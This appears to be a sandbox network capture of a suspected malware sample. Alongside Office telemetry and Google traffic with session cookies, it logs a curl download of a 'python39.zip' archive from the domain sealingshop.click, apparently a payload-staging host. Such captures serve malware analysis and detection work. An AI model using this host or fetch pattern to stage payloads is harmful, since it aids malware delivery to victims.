NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:16 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xNXCtlWyRwuScJzNv2kXjQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 11:20:16 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:17 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:20:18 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:17 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 03 Dec 2024 18:21:00 GMT ETag: "0x8DD13C73D7EC056" x-ms-request-id: 85afd668-301e-0052-47c3-4565d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T112017Z-1746fd949bdlqd7fhC1EWR6vt0000000019g000000004ngq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:20:18 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-04 11:20:18 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:18 UTC	1382	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:19 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Wed, 04 Dec 2024 11:20:18 GMT Expires: Wed, 04 Dec 2024 11:20:18 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:19 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:19 UTC	97	OUT	GET /app/python39.zip HTTP/1.1 Host: sealingshop.click User-Agent: curl/7.83.1 Accept: /
2024-12-04 11:20:20 UTC	999	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:20 GMT Content-Type: application/zip Content-Length: 23688054 Connection: close last-modified: Mon, 25 Nov 2024 12:14:57 GMT etag: "1697376-67446a41-2554ff6427b38b36;;;" platform: hostinger panel: hpanel x-turbo-charged-by: LiteSpeed Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtrsz6QELl5ORanM6YH4pM%2F1K5bXTy5rN0MpvkhN1J4TJ1Iuy2oQ2ryAtnJLkQlIvfNa39Mf8%2Bgon6e6dksd6AcOe%2FZZzzzPvnO3bP5UW7AZeQd%2FAYr5AGrxzmKGMTILA01kcg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ecb68136a31c434-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1646&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=735&delivery_rate=1773997&cwnd=196&unsent_bytes=0&cid=26c60eebd71fae28&ts=949&x=0"
2024-12-04 11:20:20 UTC	370	IN	Data Raw: 50 4b 03 04 14 00 00 00 00 00 6c a8 77 59 00 00 00 00 00 00 00 00 00 00 00 00 04 00 20 00 4c 69 62 2f 55 54 0d 00 07 9d b3 42 67 03 b5 42 67 4d b3 42 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 50 4b 03 04 14 00 08 00 08 00 eb 7c 77 59 00 00 00 00 00 00 00 00 ce 13 00 00 0a 00 20 00 4c 69 62 2f 61 62 63 2e 70 79 55 54 0d 00 07 aa 67 42 67 9d b3 42 67 aa 67 42 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 dd 58 4b 6f db 46 10 be 1b f0 7f 98 3a 07 51 81 42 24 ed a1 a8 81 00 75 9c b4 0d 50 37 81 9b 1c 7a 12 56 e4 48 da 86 da 65 76 97 72 84 a2 ff bd 33 fb e0 4b 8c 12 27 39 95 07 9b 5c ce 7c fb cd 63 67 86 7a 00 d7 ba 3e 18 b9 d9 3a f8 fe f1 e3 1f e1 57 ad 37 15 2e e0 a5 2a 72 b8 aa 2a b8 e5 77 16 6e d1 a2 d9 63 99 9f 9f 3d 80 df 65 81 ca 62 09 4e c3 eb Data Ascii: PKlwY Lib/UTBgBgMBguxPK\|wY Lib/abc.pyUTgBgBggBguxXKoF:QB$uP7zVHevr3K'9\\|cgz>:W7.rwnc=ebN
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 23 0d 71 70 5b e1 e8 0f b2 84 28 98 18 48 0b 44 ec 86 9e 81 d0 c8 3a 49 b6 c3 da e8 1d 48 97 03 5c 05 88 20 ec f5 b7 c2 92 07 3a 84 81 4e c2 2a 84 52 da c1 0a 83 ba 54 d6 09 e5 a4 70 24 d8 a8 0a 49 4f 90 cf f5 9a 76 b1 47 cc 41 18 04 bd 47 63 64 59 a2 ca 03 c8 1b 22 7e 24 49 1b d1 2e f4 af aa 18 da 7a 47 a8 03 23 b3 a1 4a 9b 9d a8 82 fe cc 36 35 9a 99 97 25 fd 62 2b 94 b4 3b 4b 46 8e 3c 3e 87 9d 38 30 6a 13 43 4f ee ae 88 52 80 39 a2 b0 26 c7 d5 46 13 b6 93 e4 64 a1 4a 52 b0 85 91 35 05 a8 8b c2 5b 2b 36 78 99 9e 3a a7 5e 67 ad 2f 9f 46 f7 a5 58 a7 eb e7 21 c1 e1 4b 4e 99 dd 61 99 44 96 d1 08 8b d5 7a 01 79 9e 8f c1 f8 a2 e5 36 9b c2 4d cc b2 7c b9 94 76 b8 db 72 09 4f e1 8d 69 a2 f9 06 5d 63 54 92 0f 59 1b 0c 49 6a fe 29 b2 e8 dd df 23 81 7b 5a 9d ff 9e Data Ascii: #qp[(HD:IH\ :N*RTp$IOvGAGcdY"~$I.zG#J65%b+;KF<>80jCOR9&FdJR5[+6x:^g/FX!KNaDzy6M\|vrOi]cTYIj)#{Z
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 36 c5 59 93 33 dc 79 58 d2 5d ee bf 6f 55 f5 fb 31 c3 91 1f 71 0e 38 02 89 c5 99 ea aa ea ea 7a 74 57 57 37 0f 0e 0e 5e 57 f5 6a c5 aa 9c ed 92 a2 e4 ec c9 f3 67 cf 8e 9f b2 24 5b d2 9f 6c 95 6e 78 39 ba 7d eb f6 ad 37 19 fc 55 32 7e b5 db a4 8b b4 da 5c b3 b2 4a 2a be 64 79 b5 e6 c5 65 5a f2 21 83 bf d8 92 97 8b 22 dd 55 69 9e b1 39 df e4 97 2c 2d 59 55 d4 fc f6 ad 39 80 b2 55 5e 28 2a 84 3c 46 eb 49 66 83 b0 75 52 12 ea 55 be 01 7c 69 76 01 a4 8b 7a 51 d5 05 27 70 c6 8e 8e fd cf 11 3e fe 9d 3d 7b f5 f3 0b 66 7d 7e 6f 85 7e 5c a6 ff cd cf 62 d0 47 11 68 04 40 3e 9f da d0 f4 b8 11 fa f1 62 5d 67 ef cb 33 07 9a fe 37 0a 90 74 7e 1c 65 50 0b d1 15 21 08 0e e5 77 80 6f 0e 58 9a 95 15 4f 60 08 57 f4 e4 e9 81 90 3e 23 2e d9 22 cf ca b4 ac 4a 7c 9d 64 2c 5d f2 Data Ascii: 6Y3yX]oU1q8ztWW7^Wjg$[lnx9}7U2~\JdyeZ!"Ui9,-YU9U^(<FIfuRU\|ivzQ'p>={f}~o~\bGh@>b]g37t~eP!woXO`W>#."J\|d,]
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: 34 02 13 71 32 69 08 c2 a1 18 67 ad 00 64 03 13 42 dc 06 76 08 91 a0 26 72 b8 a0 f4 9c e1 0b c5 84 67 ff 21 13 26 56 94 56 ac c0 ff 0d 69 a4 9d 49 b2 85 21 f0 e7 a8 f4 a1 d7 f5 c2 83 df 4a 39 0c e1 e3 c9 9f c7 08 a2 7d 11 0c c7 e9 17 7a af 9c b4 9c 1a 4b 7f 3a 44 73 8a f3 9c 2c 97 96 ef 21 77 29 3d 92 e3 dd 9b 9d 91 ef 88 d0 60 f3 ba da d5 95 54 15 98 d9 ac ea 8d ef 9e 33 ec ef 3c cd 12 6a 43 8a a9 f8 1d 10 8f a4 f9 62 04 8a e4 b2 8f 73 53 9f 77 02 71 e2 3a 21 02 ea 20 11 e1 5d ea 5d 44 f0 62 1d 4b eb 3d 8f 52 57 32 38 a0 40 62 b1 96 04 7c 94 9e 27 6e 02 35 f3 c7 08 97 96 10 6f df fa 67 5e b3 12 7a 06 2b 5a a5 65 d6 a0 cf 39 cc 0f b8 c4 5e c0 b0 b9 c2 63 18 1d ad 47 72 95 2c e6 e1 be ba 9b 68 99 71 4e a1 6d 4e 93 56 5c 84 03 3b e4 55 21 80 80 b3 21 46 72 Data Ascii: 4q2igdBv&rg!&VViI!J9}zK:Ds,!w)=`T3<jCbsSwq:! ]]DbK=RW28@b\|'n5og^z+Ze9^cGr,hqNmNV\;U!!Fr
2024-12-04 11:20:20 UTC	1369	IN	Data Raw: c5 6f 26 3b dd d6 0d 01 e1 37 54 52 b2 5b 3e 0d 76 46 0e 70 23 e6 c0 df 0f 89 e1 42 41 5b b8 fa b0 9e fb 0d b7 36 9b b7 67 63 b9 bb db b7 f6 6e c6 00 62 1a 4f b5 b2 7b 82 8c 20 7e e9 a5 61 ad 96 14 29 12 2b c5 36 2c 25 03 70 f5 8d e0 0a 48 c1 c2 42 1d a2 ea 07 dd 82 72 00 1f 92 74 43 dc ca 7c 0b a0 c1 84 73 5e 5f ac 59 b2 db 15 f9 0e c0 95 9f 3c d4 d9 63 ea 93 4f 88 cd 68 59 7d 7c 4c 98 4c 12 9a 96 ed fe 46 a7 4c 19 88 ac 8a c8 3d 2b 34 e2 23 b2 51 05 71 82 f8 66 33 f4 d8 b3 99 4e 33 68 aa c6 56 24 e9 a6 fd 45 97 80 d5 77 8b 8c b7 6d e9 93 92 86 d7 40 c8 e4 75 bb 90 d1 1b 8b 1e 11 63 f1 01 19 b2 27 4c 58 a9 1d 20 b2 b7 8e 04 ed ed 52 8f a4 71 2d 92 64 7c 3b b4 03 11 7b 7f d5 23 a2 bd 95 a4 21 73 31 8d 7b a2 a9 48 3f 0c 3a 52 b6 f6 5c 23 84 69 03 45 12 f6 Data Ascii: o&;7TR[>vFp#BA[6gcnbO{ ~a)+6,%pHBrtC\|s^_Y<cOhY}\|LLFL=+4#Qqf3N3hV$Ewm@uc'LX Rq-d\|;{#!s1{H?:R\#iE
